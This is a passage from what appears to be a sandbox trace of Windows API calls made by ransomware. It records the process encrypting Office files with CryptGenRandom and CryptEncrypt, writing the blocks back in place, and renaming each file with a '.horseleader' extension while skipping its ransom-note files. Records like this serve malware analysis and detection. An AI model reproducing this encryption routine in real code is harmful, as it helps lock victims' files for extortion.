Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL", lpSrch=".testttjffg") returned 0x0 [0244.469] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.469] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.469] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.470] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL") returned 109 [0244.471] StrStrW (lpFirst="BRANDING.DLL", lpSrch=".txt") returned 0x0 [0244.471] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=15224) returned 1 [0244.471] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x3b78, lpOverlapped=0x0) returned 1 [0244.473] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffc488, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.473] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x3b78, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x3b78, lpOverlapped=0x0) returned 1 [0244.474] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0244.474] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.474] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.474] CloseHandle (hObject=0x15c) returned 1 [0244.474] GetProcessHeap () returned 0x780000 [0244.474] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.474] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL.horseleader") returned 121 [0244.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.dll.horseleader")) returned 1 [0244.479] GetProcessHeap () returned 0x780000 [0244.479] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.479] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x470e1800, ftCreationTime.dwHighDateTime=0x1caccea, ftLastAccessTime.dwLowDateTime=0x15334ff0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x470e1800, 
ftLastWriteTime.dwHighDateTime=0x1caccea, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="BRANDING.XML", cAlternateFileName="")) returned 1 [0244.479] lstrcmpiW (lpString1="BRANDING.XML", lpString2="Windows") returned -1 [0244.479] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 109 [0244.479] StrStrIW (lpFirst="BRANDING.XML", lpSrch=".horseleader") returned 0x0 [0244.479] lstrcmpW (lpString1="BRANDING.XML", lpString2="#Decrypt#.txt") returned 1 [0244.479] lstrcmpW (lpString1="BRANDING.XML", lpString2="_uninstalling_.png") returned 1 [0244.479] lstrlenW (lpString=".testttjffg") returned 11 [0244.479] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML", lpSrch=".testttjffg") returned 0x0 [0244.479] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.479] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.479] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.481] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 109 [0244.481] StrStrW (lpFirst="BRANDING.XML", lpSrch=".txt") returned 
0x0 [0244.481] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=596341) returned 1 [0244.481] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.481] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.484] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.484] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.486] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x464ba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.486] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.488] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.488] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.489] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x8c975, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.489] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.491] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.492] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.492] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.492] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.492] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.492] CloseHandle (hObject=0x15c) returned 1 [0244.492] GetProcessHeap () returned 0x780000 [0244.492] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.492] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.horseleader") returned 121 [0244.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.horseleader" (normalized: 
"c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.horseleader")) returned 1 [0244.493] GetProcessHeap () returned 0x780000 [0244.493] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.493] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4114ea00, ftCreationTime.dwHighDateTime=0x1ca6af2, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x4114ea00, ftLastWriteTime.dwHighDateTime=0x1ca6af2, nFileSizeHigh=0x0, nFileSizeLow=0x11644, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OCT.CHM", cAlternateFileName="")) returned 1 [0244.493] lstrcmpiW (lpString1="OCT.CHM", lpString2="Windows") returned -1 [0244.493] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 104 [0244.493] StrStrIW (lpFirst="OCT.CHM", lpSrch=".horseleader") returned 0x0 [0244.493] lstrcmpW (lpString1="OCT.CHM", lpString2="#Decrypt#.txt") returned 1 [0244.493] lstrcmpW (lpString1="OCT.CHM", lpString2="_uninstalling_.png") returned 1 [0244.493] lstrlenW (lpString=".testttjffg") returned 11 [0244.493] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM", lpSrch=".testttjffg") returned 0x0 [0244.494] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.494] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.494] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.495] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM") returned 104 [0244.495] StrStrW (lpFirst="OCT.CHM", lpSrch=".txt") returned 0x0 [0244.495] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=71236) returned 1 [0244.495] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.495] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.498] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.498] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.498] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x6322, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.498] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.499] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0244.499] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.499] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xc644, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.500] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.500] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.500] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x5000, lpOverlapped=0x0) returned 1 [0244.500] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.500] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.500] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.501] CloseHandle (hObject=0x15c) returned 1 [0244.501] GetProcessHeap () returned 0x780000 [0244.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.501] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.horseleader") returned 116 [0244.501] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OCT.CHM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\oct.chm.horseleader")) returned 1 [0244.501] GetProcessHeap () returned 0x780000 [0244.502] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.502] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7c27050, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeefe5e10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OfficeMUI.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0244.502] lstrcmpiW (lpString1="OfficeMUI.XML", lpString2="Windows") returned -1 [0244.502] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 110 [0244.502] StrStrIW (lpFirst="OfficeMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.502] lstrcmpW (lpString1="OfficeMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.502] lstrcmpW (lpString1="OfficeMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.502] lstrlenW (lpString=".testttjffg") returned 
11 [0244.502] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.502] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.502] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML") returned 110 [0244.503] StrStrW (lpFirst="OfficeMUI.XML", lpSrch=".txt") returned 0x0 [0244.503] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=5557) returned 1 [0244.503] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x15b5, lpOverlapped=0x0) returned 1 [0244.505] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffea4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.505] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x15b5, lpOverlapped=0x0) returned 1 [0244.505] SetFilePointerEx (in: hFile=0x15c, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.505] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.505] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.505] CloseHandle (hObject=0x15c) returned 1 [0244.505] GetProcessHeap () returned 0x780000 [0244.505] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de8c8 [0244.505] wnsprintfW (in: pszDest=0x7de8c8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.horseleader") returned 122 [0244.506] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.horseleader")) returned 1 [0244.506] GetProcessHeap () returned 0x780000 [0244.506] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de8c8 | out: hHeap=0x780000) returned 1 [0244.506] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf2b422b0, 
ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="OfficeMUISet.XML", cAlternateFileName="OFFICE~2.XML")) returned 1 [0244.507] lstrcmpiW (lpString1="OfficeMUISet.XML", lpString2="Windows") returned -1 [0244.507] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 113 [0244.507] StrStrIW (lpFirst="OfficeMUISet.XML", lpSrch=".horseleader") returned 0x0 [0244.507] lstrcmpW (lpString1="OfficeMUISet.XML", lpString2="#Decrypt#.txt") returned 1 [0244.507] lstrcmpW (lpString1="OfficeMUISet.XML", lpString2="_uninstalling_.png") returned 1 [0244.507] lstrlenW (lpString=".testttjffg") returned 11 [0244.507] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML", lpSrch=".testttjffg") returned 0x0 [0244.507] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.507] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.507] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.507] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office 
Setup Controller\\Office.en-us\\OfficeMUISet.XML") returned 113 [0244.507] StrStrW (lpFirst="OfficeMUISet.XML", lpSrch=".txt") returned 0x0 [0244.507] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=819) returned 1 [0244.508] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x333, lpOverlapped=0x0) returned 1 [0244.510] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.510] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x333, lpOverlapped=0x0) returned 1 [0244.510] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.510] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.510] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, 